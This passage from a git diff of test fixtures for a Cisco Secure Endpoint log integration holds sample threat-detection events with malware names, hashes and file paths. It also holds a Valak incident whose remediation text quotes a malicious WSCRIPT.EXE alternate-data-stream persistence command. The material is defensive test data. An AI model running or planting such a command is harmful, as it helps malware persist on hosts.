Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":240000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669405052633000,"timestamp":1610705998,"timestamp_nanoseconds":847000000,"date":"2021-01-15T10:19:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669405052633129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":375000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595368","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":360000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669143059628000,"timestamp":1610705937,"timestamp_nanoseconds":968000000,"date":"2021-01-15T10:18:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669143059628070","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259286289613000,"timestamp":1610705905,"timestamp_nanoseconds":669000000,"date":"2021-01-15T10:18:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259286289612895","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259234750005000,"timestamp":1610705893,"timestamp_nanoseconds":657000000,"date":"2021-01-15T10:18:13+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259234750005342","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259183210398000,"timestamp":1610705881,"timestamp_nanoseconds":645000000,"date":"2021-01-15T10:18:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259183210397789","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180335966167761000,"timestamp":1610705878,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:17:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180335966167760897","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":653000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
\ No newline at end of file
diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json
index 5e7cd1ad897..cd5c1bd78da 100644
--- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json
@@ -10,7 +10,7 @@
 "Demo_Threat_Hunting"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -51,8 +51,8 @@
 "event": {
 "severity": 4,
 "action": "SecureX Threat Hunting Incident",
- "ingested": "2021-09-30T00:14:16.070123141Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. 
Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n - Review all activity performed by the user\\r\\n - Upload any suspicious files to ThreatGrid for analysis\\r\\n - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. 
Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). 
Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. 
Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. 
